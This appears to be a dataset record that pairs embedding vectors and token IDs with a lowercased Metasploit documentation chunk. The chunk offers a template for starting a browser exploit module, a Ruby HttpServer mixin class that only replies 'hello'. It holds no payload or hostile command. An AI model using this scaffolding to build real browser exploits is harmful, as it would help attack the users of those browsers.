-0.28853344917297363, 0.383500337600708, -0.19070293009281158, 0.041420828551054, -0.09307730942964554, -0.2831100523471832, -0.44611096382141113, -0.035562001168727875, -0.17096661031246185, 0.2880478799343109, 0.20027971267700195, 0.43985551595687866, -0.009626390412449837, -0.2412135899066925, 1.3645575046539307, -0.8971996307373047, 0.015080519020557404, -0.09778611361980438, -0.06682531535625458, -0.22017788887023926, 0.3507482409477234, -0.6513618230819702, 0.46248722076416016, 0.9198238849639893, 0.7828759551048279, -0.37709689140319824, 0.4298543930053711, -0.23007111251354218, 0.3409087657928467, 0.3632734417915344, -0.5295587778091431, -0.6588820815086365, -0.06771554797887802, -0.020293621346354485, -0.3688410520553589, -0.9490537047386169, -0.2428116798400879, -0.05914781987667084, -0.16618849337100983, 0.3490147590637207, -0.5593878030776978, -0.048671428114175797, 0.01499194372445345, 0.35728517174720764, 0.37581780552864075, 0.10169786214828491, 0.4133349359035492, -0.21768026053905487, -0.44022470712661743, 0.5841553211212158, 0.4162469506263733, 0.5316039323806763, 0.3829152286052704, 0.997344970703125, -0.3387948274612427, 0.09872960299253464, 0.1160709410905838, 0.0380353145301342, 0.039596982300281525, -0.2996213138103485, -0.555812656879425, -0.16964751482009888, 0.37556833028793335, -0.7373349666595459, 1.0538941621780396, -0.2875387668609619, -0.16439831256866455, -0.5792790651321411, 0.16570539772510529, -0.5507610440254211, -0.3236016631126404, -0.15782731771469116, -0.15077631175518036, -0.6862882971763611, 0.023032700642943382, 0.40363889932632446, 0.28685426712036133, 0.26333895325660706, -0.47274795174598694, -0.4732550084590912, 0.1485784947872162, 0.4795137047767639, -0.4752833843231201, 0.22876638174057007, -0.16025611758232117, -0.08146615326404572, -0.37786102294921875, -1.0068142414093018, -0.3815835118293762, -0.8191747665405273, -0.11979833990335464, 0.056956253945827484, 0.8218420743942261, 0.3660646975040436, 0.3162446916103363, 0.2764990031719208, -0.5149630308151245, -0.49507731199264526, 0.507615327835083, 0.92322838306427, -0.21430011093616486, 0.588527262210846, 0.6900190711021423, -0.07620730996131897, -0.11682765930891037, -0.49881884455680847, 0.4696199297904968, -0.06860513240098953, -0.4591507911682129, -0.19426001608371735, -0.30042481422424316, -1.0963305234909058, -0.47370684146881104, -0.3121032416820526, 0.28135696053504944, 0.5905438661575317, -0.24374708533287048, -0.8539187908172607, -0.527495265007019, -0.7986056804656982, 0.1998329907655716, -0.1258690059185028, -0.1129184365272522, 0.18431276082992554, -0.07563227415084839, 0.6564310789108276, -0.7410932183265686, 4.1988139152526855, 0.14265161752700806, -0.08062935620546341, 0.3898562788963318, 0.4888364374637604, 0.871588945388794, 0.6819612979888916, -0.22498469054698944, 0.6310093998908997, -0.49786096811294556, 0.4670262634754181, -0.03060459904372692, 0.5645307302474976, 1.0439436435699463, 0.4200616776943207, 0.43904775381088257, -0.3518838882446289, 0.5628916025161743, 0.40940213203430176, -1.0101799964904785, -0.9858757257461548, -0.027524475008249283, -0.42446544766426086, 0.9559731483459473, 0.5059089064598083, 0.37193480134010315, 0.22452832758426666, -0.8681742548942566, 0.027809947729110718, -0.009877690114080906, -0.23765099048614502, 0.020306527614593506, 0.08300875872373581, -0.31053096055984497, 0.017783356830477715, -0.21721109747886658, 0.12289617210626602, -0.37937793135643005, -0.48011502623558044, 0.2135537564754486, 0.6985682845115662, 0.11481428146362305, -0.05364629998803139, -0.19858141243457794, 0.5754969120025635, 0.9526481032371521, -0.2407682240009308, -0.11916638910770416, 0.6837441921234131, -0.7259031534194946, 0.03788548335433006, 0.04616369679570198, 0.4343780279159546, 0.18684720993041992, -0.8982203006744385, 0.168533056974411, 0.5012823343276978, -0.24706260859966278, -0.0675521269440651, -0.6177033185958862, 0.4118824005126953, -0.39320865273475647, 0.4185785949230194, -0.2315080612897873, -0.3982722759246826, 0.7856858968734741, -0.5402833223342896, 0.054326895624399185, -0.06167153641581535, -0.2022632509469986, -0.05383345112204552, -0.380719393491745, -0.43958431482315063, -0.7284045219421387, 0.7271961569786072, -0.05614571273326874, -0.3550633192062378, 0.19251230359077454, 0.826500415802002, -0.3664173185825348, -0.5854843258857727, -0.981120228767395, -0.7995215654373169, 0.527688205242157, 0.6408395171165466, 0.6844865679740906, -0.03676878288388252, -0.7781854867935181, 0.5187351703643799, 0.20622792840003967, 0.5819936394691467, 0.4417745769023895, -0.17425523698329926, 0.23809240758419037, -0.0037551058921962976 ]
[ 1007, 2203, 2036, 3602, 2008, 1999, 2344, 2000, 5047, 1037, 8299, 5227, 1010, 2009, 2442, 5383, 1996, 2918, 24471, 11514, 8988, 1010, 2029, 2011, 12398, 2003, 6721, 1012, 2023, 2965, 2065, 2017, 2215, 2000, 5047, 3674, 24471, 2483, 1006, 2825, 2065, 2017, 2342, 2000, 5047, 1037, 2417, 7442, 6593, 2030, 1037, 4957, 1007, 1010, 2017, 2036, 2342, 2000, 2191, 2469, 2027, 2031, 1996, 2918, 24471, 11514, 8988, 1012, 2000, 12850, 1996, 2918, 24471, 11514, 8988, 1010, 2017, 2064, 2224, 1996, 1523, 2131, 1035, 7692, 1524, 4118, 1010, 2182, 1521, 1055, 2019, 2742, 1024, 13366, 3710, 1035, 3931, 1035, 1015, 1006, 18856, 2072, 1007, 16129, 1027, 1000, 2023, 2003, 3931, 1015, 1000, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 16129, 1007, 2203, 13366, 3710, 1035, 3931, 1035, 1016, 1006, 18856, 2072, 1007, 16129, 1027, 1000, 2023, 2003, 3931, 1016, 1000, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 16129, 1007, 2203, 13366, 3710, 1035, 12398, 1035, 3931, 1006, 18856, 2072, 1007, 16129, 1027, 1003, 1053, 1064, 1026, 16129, 1028, 1026, 1037, 17850, 12879, 1027, 1000, 1001, 1063, 2131, 1035, 7692, 1012, 16480, 8737, 1006, 1005, 1013, 1005, 1007, 1065, 1013, 3931, 1035, 1015, 1012, 16129, 1000, 1028, 2175, 2000, 3931, 1015, 1026, 1013, 1037, 1028, 1026, 7987, 1028, 1026, 1037, 17850, 12879, 1027, 1000, 1001, 1063, 2131, 1035, 7692, 1012, 16480, 8737, 1006, 1005, 1013, 1005, 1007, 1065, 1013, 3931, 1035, 1016, 1012, 16129, 1000, 1028, 2175, 2000, 3931, 1016, 1026, 1013, 1037, 1028, 1026, 1013, 16129, 1028, 1064, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 16129, 1007, 2203, 13366, 2006, 1035, 5227, 1035, 24471, 2072, 1006, 18856, 2072, 1010, 5227, 1007, 2553, 5227, 1012, 24471, 2072, 2043, 1013, 3931, 1035, 1015, 1032, 1012, 16129, 1002, 1013, 3710, 1035, 3931, 1035, 1015, 1006, 18856, 2072, 1007, 2043, 1013, 3931, 1035, 1016, 1032, 1012, 16129, 1002, 1013, 3710, 1035, 3931, 1035, 1016, 1006, 18856, 2072, 1007, 2842, 3710, 1035, 12398, 1035, 3931, 1006, 18856, 2072, 1007, 2203, 2203, 1997, 2607, 1010, 2043, 2017, 4339, 1037, 18804, 13102, 4135, 4183, 16602, 18077, 2045, 1521, 1055, 1037, 2843, 2062, 2017, 2342, 2000, 2228, 2055, 1012, 2005, 2742, 1010, 2115, 11336, 2763, 3791, 2000, 2079, 16602, 10788, 1010, 2138, 2009, 2876, 1521, 1056, 2191, 2151, 3168, 2000, 3499, 18546, 2000, 4374, 2019, 29464, 18077, 1010, 2052, 2009, 1029, 2017, 2763, 2036, 2342, 2000, 3857, 1037, 18093, 2008, 1521, 1055, 3563, 2000, 1996, 4539, 1010, 2029, 2965, 2115, 11336, 3791, 2000, 2113, 2054, 4539, 2009, 1521, 1055, 7294, 1010, 1998, 2017, 2031, 2000, 3857, 1037, 4118, 2000, 7661, 4697, 1996, 18077, 11914, 1010, 4385, 1012, 1996, 16770, 2121, 6299, 1998, 16770, 2121, 6299, 1024, 1024, 16129, 4666, 2378, 3640, 2035, 7957, 1997, 4725, 2000, 3499, 2017, 2000, 14570, 2035, 2122, 1012, 2191, 2469, 2000, 4638, 2041, 1996, 17928, 12653, 1006, 2017, 2064, 2593, 2079, 2023, 2011, 2770, 5796, 2546, 1013, 12653, 1013, 8991, 3527, 6169, 1012, 14021, 1010, 2030, 2074, 2448, 1523, 4220, 1524, 1999, 1996, 5796, 2546, 14176, 1007, 1010, 2030, 4638, 5833, 4493, 3642, 4973, 1006, 2926, 1996, 3522, 3924, 1007, 1012, 2000, 2131, 2477, 2318, 1010 ]
metasploit
110.txt
1
you can always use the following template to start developing your browser exploit : # # # this module requires metasploit : url # current source : url # # class metasploitmodule < msf : : exploit : : remote rank = normalranking include msf : : exploit : : remote : : httpserver def initialize ( info = { } ) super ( update _ info ( info,'name'= >'httpserver mixin example ','description'= > % q { here's an example of using the httpserver mixin },'license'= > msf _ license,'author'= > ['sinn3r'],'references'= > [ ['url ','http : / / metasploit. com'] ],'platform'= >'win ','targets'= > [ ['generic ', { } ], ],'disclosuredate'= >'2013 - 04 - 01 ','defaulttarget'= > 0 ) ) end def on _ request _ uri ( cli, _ request ) html ='hello'send _ response ( cli, html ) end end if you want to take a closer look at what the mixin can do, see : url / blob / master / lib / msf / core / exploit / http / server. rb [SEP]
[ 0.2406270056962967, -0.3635258972644806, -0.6072283983230591, 0.0001418907631887123, -0.14791429042816162, -0.13546821475028992, -0.7782378792762756, 0.02789774164557457, 0.008398431353271008, 0.7948947548866272, 0.3799336552619934, -0.3793521821498871, 1.1741517782211304, -0.18329831957817078, -0.20117159187793732, 0.16998572647571564, 0.028405742719769478, -0.48693177103996277, -0.7284919619560242, -0.01928001083433628, 0.07238601893186569, -0.2410614788532257, -0.8039202094078064, -0.20356646180152893, -0.4593678414821625, 0.2419804185628891, -0.42011839151382446, -0.7014258503913879, 0.8670717477798462, 0.7294523119926453, 0.18634183704853058, -0.15275003015995026, 0.16184474527835846, -0.6803990602493286, -0.19819219410419464, -0.3068144917488098, -0.10253746062517166, -0.5853373408317566, -0.5565301179885864, -0.7618889212608337, 0.571895182132721, 0.08510039001703262, 0.03466334566473961, -0.5199832916259766, -0.5968424677848816, 0.2780560553073883, 0.03224024176597595, -0.1273648589849472, 0.27756044268608093, -0.2571682333946228, 0.3719277083873749, 1.1051521301269531, 0.2896994948387146, -0.3068263828754425, 0.23219184577465057, 0.266548752784729, -0.01026400551199913, 0.5891807079315186, -0.2760476768016815, -0.17157244682312012, -0.3900049328804016, 1.1045641899108887, -0.38357406854629517, -0.6987119317054749, 0.3181101977825165, 0.5173336267471313, -0.3147224187850952, 0.12980492413043976, -0.4105975031852722, -0.5099658966064453, -0.47753414511680603, 0.5524956583976746, -0.952102780342102, -0.6616353988647461, -0.4404166340827942, 0.2108045369386673, 0.39966797828674316, -0.3524552285671234, -0.05148867517709732, 1.3225330114364624, -0.1132938414812088, 0.8756497502326965, 0.35993140935897827, -0.36125311255455017, -0.4425429701805115, -0.05368482321500778, 0.3640788197517395, -0.008514397777616978, -0.13637883961200714, 0.14948053658008575, 0.41438987851142883, 0.39381712675094604, 0.44843655824661255, -0.2732090353965759, -0.29241085052490234, 0.07973714917898178, -0.43922585248947144, 0.5714794993400574, 0.005473069380968809, 0.21622951328754425, 0.7186471819877625, 0.8450760245323181, -0.2220836877822876, 0.05840081721544266, 0.2351544052362442, 0.5476635098457336, 0.30799150466918945, -0.11757994443178177, -0.7250629663467407, 0.009943024255335331, -0.11182188987731934, 0.16377684473991394, -0.06904073804616928, -0.1819847971200943, 0.09712674468755722, -0.15297171473503113, 0.04704112559556961, 0.7146413922309875, -0.3789050877094269, 0.2535589337348938, -0.2037167251110077, -0.7044909596443176, -0.19869503378868103, -0.4265884459018707, -0.38421714305877686, -0.464153915643692, -0.15748921036720276, 0.8446290493011475, -0.21374711394309998, -0.45558661222457886, -0.04164167866110802, -0.6273620128631592, 0.35361337661743164, 0.805349588394165, -0.133047416806221, 0.6134805083274841, -0.5149655342102051, -0.009924566373229027, 1.0771235227584839, -0.9457383751869202, 0.15202461183071136, -0.6618759632110596, -0.09775228053331375, 1.2630287408828735, 0.8937258720397949, 0.09139513224363327, 0.015286363661289215, -0.3306163549423218, -0.5827125906944275, 0.3412642180919647, -0.43461230397224426, -0.4740902781486511, 0.44754940271377563, 0.19216492772102356, 0.32852160930633545, 0.20119772851467133, -0.6613416075706482, 0.004674338735640049, 0.39706164598464966, 0.5829574465751648, -0.20546738803386688, 0.8286004066467285, -0.16094449162483215, 1.219358205795288, -0.5324162244796753, -0.0245535708963871, -0.38768404722213745, -0.5787787437438965, -0.3509995639324188, -0.701863169670105, 1.0089750289916992, -0.45254549384117126, 0.1777539998292923, 0.05265587195754051, 0.7029756307601929, -0.3071778416633606, -0.06860089302062988, -0.08855333179235458, 0.4317413866519928, 0.756931483745575, -0.16631034016609192, 0.763019859790802, 0.8548848628997803, 0.9396926164627075, -0.08278559148311615, -0.492737740278244, -0.28601977229118347, -0.18471524119377136, -0.2743358314037323, -0.3677993416786194, 0.4824388921260834, 0.40890413522720337, -0.19926157593727112, 0.12935376167297363, 0.1556026190519333, -0.3061273396015167, -0.41584452986717224, 0.24571013450622559, 0.5873347520828247, -0.3635280132293701, -0.6440433263778687, 0.23237334191799164, -0.5622317790985107, 0.6404695510864258, 0.21554668247699738, -0.4126551151275635, 0.3919866979122162, 0.15415124595165253, -0.6954560875892639, 0.02924291044473648, 0.5791235566139221, -0.3662818968296051, -0.45704588294029236, -0.1865035593509674, 0.9307205677032471, -0.26410338282585144, -0.43961429595947266, 0.010096856392920017, 0.1398632973432541, -0.22733287513256073, 0.47732409834861755, 0.562807559967041, 0.6561190485954285, 0.558812141418457, -0.3317333161830902, -0.4906301200389862, -0.444577157497406, 0.9981212615966797, -0.2650701403617859, 0.44169163703918457, -0.20650838315486908, 0.10531166940927505, -0.06276016682386398, 1.1071891784667969, 0.08079084008932114, -0.022509926930069923, 0.21617740392684937, 0.21693125367164612, 0.1768948882818222, 0.5614004135131836, 0.3766056299209595, 0.17438256740570068, 0.06067238003015518, 0.5346445441246033, -0.14744344353675842, 0.6583914756774902, 0.12284217029809952, 0.21380960941314697, -0.4525187909603119, 0.3431733548641205, -0.43218904733657837, 1.1374398469924927, -0.2022017538547516, -0.03209192305803299, -0.7280797362327576, -0.1866915076971054, -0.5742347836494446, 0.8595847487449646, -0.8375853300094604, -0.10886839777231216, 0.5266224145889282, -0.14985774457454681, -0.9313473701477051, 0.033447593450546265, 0.033832989633083344, 0.8338485956192017, -0.3863992393016815, 0.050507351756095886, -0.6313676834106445, -0.9382882714271545, -0.29231685400009155, -0.03038930706679821, -1.5561290979385376, -0.35086163878440857, -0.8736385107040405, 0.4842866063117981, 0.2035318911075592, 0.25269922614097595, -0.22506055235862732, -0.675981342792511, 0.7060858607292175, 0.8775802850723267, -0.00952349416911602, 0.5491864681243896, 0.40140387415885925, -0.5279608964920044, 0.10412272810935974, -0.15622252225875854, -0.613254725933075, 0.5040454268455505, -1.2941771745681763, -0.31545981764793396, -0.031708747148513794, -0.7125668525695801, -0.23296721279621124, -0.25710630416870117, 0.24077236652374268, 0.24738015234470367, 0.09555855393409729, 0.37231647968292236, -0.42233407497406006, 0.11331701278686523, 0.7536376118659973, 0.1784050166606903, -0.541196882724762, 0.018946774303913116, 0.04331345856189728, -0.03646378219127655, 0.7302379012107849, 0.46888911724090576, -0.5468667149543762, 1.5075868368148804, -0.29998475313186646, 0.23948495090007782, -0.7635296583175659, 0.7145938873291016, 0.5737899541854858, 0.23015040159225464, -0.2271319329738617, -0.5298003554344177, 0.04746553674340248, -0.06470013409852982, -0.0037441402673721313, -0.7336578369140625, -0.7554347515106201, 0.9577211141586304, 0.45707249641418457, -0.7479868531227112, 0.03509783372282982, -0.3555006682872772, -0.33470618724823, 0.17865733802318573, -0.4846104681491852, 0.22265589237213135, 0.3297366201877594, 0.17547474801540375, -0.0924767479300499, -0.06999742984771729, 0.09093897044658661, 0.13902446627616882, -0.2084657847881317, -0.7203748822212219, 1.188831090927124, 0.5060697793960571, -0.09630421549081802, 0.25235727429389954, 0.396360844373703, -0.7822434306144714, 0.1264393925666809, -0.2376120239496231, 0.07506049424409866, 0.917005181312561, 0.8569768071174622, 0.1493796557188034, -0.04364107549190521, 1.3313755989074707, -0.7494533061981201, 0.45140382647514343, 0.04654402658343315, 0.08703533560037613, 0.4518634080886841, 0.33142581582069397, -0.7721772193908691, -0.25660306215286255, -0.2132522165775299, -0.3133365213871002, -0.12937258183956146, 1.1592609882354736, 0.6030991673469543, -0.8611266016960144, 0.22812844812870026, -0.07590969651937485, 0.019287696108222008, 0.35234445333480835, 0.12049426883459091, -0.3728747069835663, 0.756335437297821, 0.6140627861022949, 0.3683137595653534, -0.10013937950134277, -0.19032356142997742, 0.09709043800830841, 1.1089881658554077, 0.02070673555135727, -0.224704310297966, -0.4870009124279022, -0.741766631603241, 0.07733920216560364, -0.6151247620582581, -0.7262205481529236, -0.4540400803089142, 0.09153655171394348, 0.8143773674964905, 0.22423578798770905, -0.5019378662109375, -0.4517732560634613, 0.32053592801094055, 1.1719728708267212, 0.9810891151428223, 0.27370285987854004, 0.5934988856315613, 0.284858763217926, 0.36297163367271423, 0.5167379975318909, -0.049010973423719406, 0.17509829998016357, -0.8939646482467651, 0.589180052280426, 0.05910597741603851, 0.18749195337295532, 0.13508549332618713, 0.5990458726882935, 0.29886841773986816, 0.5025876760482788, -0.9870309233665466, -0.3533485233783722, -0.4622858762741089, 0.24467171728610992, 0.6787031292915344, -0.38005727529525757, -0.20803330838680267, -0.8620361089706421, -0.453278124332428, 0.16253146529197693, 1.1742966175079346, -0.754856526851654, 0.04798385500907898, -0.16910429298877716, -0.2138933688402176, 0.5547446012496948, 0.07104583084583282, 0.0948815643787384, -1.0619041919708252, -0.39033907651901245, -1.011963129043579, 0.5985397696495056, 0.8427773714065552, -0.1022537350654602, -0.3799115717411041, -1.1045883893966675, -0.020703844726085663, -0.6915390491485596, -0.5487960577011108, -0.418967068195343, 0.1305171549320221, -0.22583311796188354, 0.4576515853404999, 0.15830525755882263, -0.08165579289197922, -0.13898403942584991, 0.3804798126220703, -0.39027175307273865, 0.4928102195262909, -0.7521049976348877, 0.19815316796302795, -0.14205797016620636, 0.4467929005622864, 0.2746463418006897, -0.1284300833940506, -0.2286905199289322, -0.5060774683952332, -0.40342891216278076, 0.2320641279220581, -1.2945131063461304, -0.6030429601669312, 0.4409841299057007, -0.37605953216552734, 0.14129649102687836, 0.5612911581993103, 0.19309447705745697, -0.9199629426002502, 0.6365819573402405, 0.8154543042182922, -0.2070121020078659, -0.12916646897792816, -0.25429657101631165, 0.2759471535682678, 0.10604461282491684, -0.22828806936740875, 0.04778646305203438, -1.3077586889266968, 1.631729006767273, 0.3433144986629486, 0.010047473013401031, -0.4890021085739136, -0.6793105602264404, 0.5670285224914551, 0.26905569434165955, 0.09637394547462463, 0.33552607893943787, -0.7523969411849976, -0.12632796168327332, 0.028603529557585716, -0.21335096657276154, -0.6253606677055359, 0.019275503233075142, 0.005438172724097967, -0.5685380697250366, 0.3158676028251648, 0.29652127623558044, 0.7360281348228455, -0.17565155029296875, -0.6022980809211731, -0.13828733563423157, -0.0712391585111618, 0.2843452990055084, -0.07199497520923615, -0.461131751537323, -0.48044463992118835, -0.11122274398803711, -0.48302626609802246, 0.45507898926734924, -0.2144092470407486, 0.3610975444316864, 0.63251131772995, -0.10438509285449982, 0.27245593070983887, -0.47128647565841675, -0.5288509130477905, 0.45705553889274597, 0.25683072209358215, -0.9641429781913757, 0.40812352299690247, 0.7751394510269165, -0.738970935344696, 1.0856003761291504, 0.5153904557228088, -0.677788496017456, -0.8721560835838318, -0.2650945782661438, 0.09256240725517273, -0.3790026903152466, -0.20506741106510162, -0.26481810212135315, -0.3931974172592163, -0.37282314896583557, 0.4720705449581146, 0.06595759093761444, -1.469685673713684, -0.11819666624069214, -0.604295551776886, -0.1743483990430832, -1.1196790933609009, -0.14781925082206726, 0.3111152648925781, -1.115118145942688, -0.04042062908411026, 0.685177743434906, 0.26318004727363586, 0.23605762422084808, -0.32627081871032715, 0.13508427143096924, 0.5947639346122742, 0.45806095004081726, -0.8840829133987427, -0.6676116585731506, 0.03531317785382271, -0.2506924867630005, -0.16196490824222565, 0.15479062497615814, -0.7221571803092957, 0.207275852560997, -0.14453309774398804, 0.9737479090690613, -1.2327940464019775, -0.05630306154489517, -0.7267521023750305, 0.445040225982666, 0.5172666311264038, -0.38892093300819397, 0.5225204229354858, -0.11250397562980652, 0.5603832602500916, -0.01893390342593193, -0.3849235475063324, 0.17098894715309143, 0.22024677693843842, -0.8414357900619507, -0.6313825845718384, 0.606888473033905, 0.3660883903503418, 0.33229491114616394, 0.11597568541765213, -1.1350061893463135, 0.3652441203594208, -0.5710480809211731, 0.25395745038986206, 0.8257357478141785, 0.01495746336877346, 0.2289360612630844, -1.088330626487732, 0.41038501262664795, 0.6729934215545654, 0.31296640634536743, -0.022120479494333267, 0.23677662014961243, 0.06103277951478958, -0.4835522770881653, -0.028025493025779724, -0.33968088030815125, -0.4791470170021057, -0.268607497215271, 0.3037639260292053, -0.9089704751968384, 0.7064018249511719, -0.7498448491096497, -0.5179908871650696, -0.045094314962625504, 0.3933654725551605, 0.7044039368629456, 0.5034974217414856, 0.3379960358142853, 0.38766172528266907, 0.406398206949234, -0.10713866353034973, -0.37825262546539307, -0.2796907126903534, -0.23930469155311584, 0.9881101846694946, -0.03422494977712631, -0.27160125970840454, 0.04052301123738289, 0.7812181115150452, -0.38229039311408997, -0.480451375246048, -0.9251329898834229, 0.1068296879529953, -0.2811795473098755, -0.5301118493080139, -0.8260562419891357, 0.24393996596336365, -0.5712175369262695, 0.7888644933700562, 0.4892699122428894, 0.21628065407276154, 0.04748871549963951, -0.4958195388317108, -0.2618308663368225, -0.1189914420247078, 0.3096490204334259, 0.4540127217769623, -0.1427498459815979, -0.5815902948379517, -0.19591067731380463, -0.03746332600712776, 0.11983826756477356, 0.5222189426422119, 0.6862859725952148, 0.7765752673149109, 0.9197292327880859, 0.6426007747650146, -0.010784696787595749, 1.2982802391052246, -1.0226327180862427, 0.5758127570152283, 0.17385950684547424, -1.083467960357666, -0.44205740094184875, -0.6681516766548157, -0.08475075662136078, -0.31228312849998474, 0.33756017684936523, 0.17156721651554108, 0.362084299325943, 0.006862531881779432, 0.028857845813035965, -0.21605905890464783, -1.1113077402114868, 0.36762747168540955, -1.1785029172897339, -0.07858272641897202, -0.08175481110811234, 0.30402544140815735, 0.20394779741764069, -0.11074814945459366, -0.6693630814552307, -0.24225498735904694, -0.9450119733810425, 0.22685204446315765, 0.6008182168006897, -0.774662971496582, -0.5936170220375061, 0.31612664461135864, -0.6011166572570801, -0.9477061629295349, -0.7448133826255798, -0.2053012251853943, -0.13673552870750427, -0.6184138655662537, -0.5275102257728577, -0.2915753722190857, -0.04785755276679993, 0.15004535019397736, -0.22105999290943146, 0.6994056105613708, -0.8024213910102844, -0.5346700549125671, -0.4558537006378174, -0.2898857891559601, -0.7292652726173401, 0.8715587854385376, 0.35365089774131775, -0.643379271030426, 0.4990698993206024, -0.1694823056459427, 0.19403119385242462, -0.1110927015542984, -0.4983009696006775, 0.779574453830719, 0.05618181452155113, -0.8140615224838257, -0.029392534866929054, -0.6192035675048828, -0.30827993154525757, 0.23319664597511292, -1.000242829322815, -0.15388549864292145, 0.7866086363792419, 0.0833798199892044, 0.44704166054725647, 0.35877659916877747, -0.2424575686454773, 0.10389290750026703, 0.7469391822814941, 0.022693786770105362, 0.4105984568595886, 0.055882103741168976, -0.7220535278320312, 0.13366742432117462, 0.4240108132362366, 0.3631989061832428, 0.4741884171962738, 0.15782035887241364, 0.35241031646728516, 0.14063483476638794, -0.3378453552722931, 0.15976493060588837, -0.7435168027877808, -0.20591045916080475, -0.4707719683647156, 0.721942126750946, 0.017987145110964775, 0.6836237907409668, 0.09214324504137039, -0.4111161231994629, -0.2589899003505707, 0.0543421171605587, -0.9414222836494446, -0.3720543086528778, 0.4994949698448181, -0.6499021053314209, -0.3001887798309326, -0.4685083031654358, 0.1501161754131317, -0.12323983758687973, 0.09955234080553055, -0.38187846541404724, 0.2797456383705139, -0.2669115662574768, -0.07257013022899628, 0.4585558772087097, -0.47009092569351196, -0.2824954092502594, -0.5875640511512756, -0.23527070879936218, -0.16328343749046326, -0.7112144827842712, 0.16696497797966003, 0.9451494812965393, -0.020305540412664413, -0.463089257478714, -0.46184802055358887, -0.004651109222322702, -0.0687592551112175, 0.34120437502861023, -0.43107345700263977, 0.016412125900387764, -0.5408914685249329, 0.0598519891500473, -0.2372381091117859, 0.925951361656189, -0.16052913665771484, 0.26236894726753235, -0.7698034644126892, -0.5652947425842285, 0.17204314470291138, 0.9564709067344666, -0.23688413202762604, 0.04597838222980499, 0.6649284958839417, 0.6257235407829285, 1.0209941864013672, -0.47444993257522583, -0.72828209400177, -0.4967506527900696, 1.0912114381790161, 0.6599414348602295, 1.0492182970046997, 0.3080105185508728, 0.7203781008720398, 0.36980506777763367, -0.7840338945388794, -0.3521084785461426, -0.09850075095891953, -0.6368042230606079, -0.24428248405456543, 0.9004971385002136, -0.4007088541984558, 0.3638290762901306, 0.0654519721865654, 0.27352577447891235, 0.19741028547286987, -0.4291665554046631, 0.7506297826766968, -0.5482022166252136, -0.4145597219467163, 0.4467354714870453, -0.7107327580451965, -0.022089386358857155, 0.5128659009933472, -0.2877059876918793, 0.6728022694587708, 0.12898454070091248, -0.5949507355690002, 0.2477589100599289, 0.9888297915458679, 0.5949850082397461, -0.5778005719184875, -0.014316034503281116, -0.03487832844257355, 0.08933313190937042, -0.20148535072803497, 0.6419422626495361, -0.9023365378379822, 0.4870869517326355, -0.1965472251176834, -0.5867437720298767, -1.3674827814102173, -0.17720699310302734, -0.003843426238745451, 0.5895084738731384, -0.10259242355823517, -0.05633551627397537, -0.2998974919319153, -0.13149674236774445, 0.6639909148216248, -0.045861538499593735, 0.09470713138580322, 0.9733496904373169, -0.4950031042098999, -0.22700601816177368, 0.894226610660553, 0.23906853795051575, 0.03716710954904556, -0.2472350001335144, 1.084346890449524, 0.5113062858581543, 0.5917556881904602, 0.18407444655895233, 0.03975561261177063, 0.4460725784301758, 0.3683236241340637, -0.6563994288444519, -0.001201497740112245, -0.40374088287353516, -0.02493342012166977, 0.34231099486351013, -0.47878843545913696, -0.14145539700984955, 0.17439304292201996, 0.4286283254623413, -0.21095678210258484, -0.21100766956806183, 1.4161806106567383, -0.36807265877723694, -0.7844985723495483, -0.16094423830509186, 1.0073121786117554, 0.00930686853826046, 0.011721068061888218, -0.41017118096351624, -0.13644789159297943, -0.4310946464538574, -0.24286454916000366, -1.1654305458068848, 0.426692932844162, 0.13125933706760406, 0.27761149406433105, -0.5545030236244202, -0.5066463351249695, 0.3829604983329773, 0.08669263869524002, -0.04819675162434578, -0.09527914971113205, 0.3591914772987366, 0.30615225434303284, 0.8887330293655396, 0.22122137248516083, -0.2678684890270233, 0.21361352503299713, 0.28384771943092346, 0.6131812334060669, 0.05111483111977577, 0.2064153105020523, 0.17587535083293915, -0.40948617458343506, 0.23880203068256378, 0.29650720953941345, 0.22564364969730377, -0.4148519039154053, -0.29770225286483765, -0.26384732127189636, -0.23679955303668976, -0.6872460842132568, -1.1533929109573364, 0.09795249998569489, 0.4573729932308197, 0.3429049849510193, -0.8303623795509338, -0.15193133056163788, -0.457325279712677, -1.0271614789962769, -0.27552804350852966, -0.717853844165802, -0.4248117208480835, -0.031651876866817474, -0.6396800875663757, 0.020816806703805923, -0.6921156048774719, 4.2262678146362305, 0.15994814038276672, 0.1176975890994072, 0.4554218351840973, 0.23793292045593262, 0.7179641127586365, 0.3423651158809662, 0.2547333836555481, 0.4898182451725006, -0.951482355594635, 0.33715909719467163, 0.014571449719369411, 0.22628135979175568, 0.8722552061080933, 0.24143287539482117, 0.14040212333202362, -0.1456778347492218, 0.08329080790281296, -0.11093343049287796, -0.7605260610580444, -0.7020077109336853, -0.12309759855270386, -0.581014096736908, 0.8384211659431458, 0.7637911438941956, 0.5560619831085205, -0.009450433775782585, -0.4234507977962494, -0.03610103204846382, -0.12689225375652313, 0.08757809549570084, -0.06077554449439049, 0.578954815864563, -0.6420442461967468, -0.3771355450153351, 0.2697698473930359, -0.04718201234936714, -0.06391651183366776, -0.6316854357719421, -0.2554919421672821, 0.8383837342262268, -0.09782210737466812, 0.14356954395771027, -0.08415841311216354, -0.009395955130457878, 0.7017835378646851, 0.007123675663024187, -0.22306445240974426, 0.2673972249031067, 0.1996958702802658, -0.024988874793052673, 0.012184315361082554, 0.189615398645401, -0.43304443359375, -0.3845653533935547, 0.4296282231807709, 0.007886596024036407, -0.2035180628299713, 0.09663522243499756, 0.2381386011838913, -0.22631557285785675, 0.23466967046260834, -0.45633047819137573, 0.2606295347213745, -0.2947673797607422, 0.3012712895870209, 0.533248782157898, 0.43700072169303894, -0.34618207812309265, -0.2329961359500885, 0.34330350160598755, -0.5613391399383545, 0.058109913021326065, -1.1647849082946777, -0.10707796365022659, 0.2661753296852112, 0.15973183512687683, 0.6222146153450012, 0.3751603662967682, -0.7707805633544922, 0.03689954802393913, 0.37748515605926514, -0.26169827580451965, -0.4638250470161438, -0.03213358670473099, -0.2667994797229767, -0.08153711259365082, 0.009773284196853638, -0.10915955901145935, 0.5644820332527161, 0.4457804262638092, 0.34980055689811707, -0.24748553335666656, 0.5534494519233704, 0.6271503567695618 ]
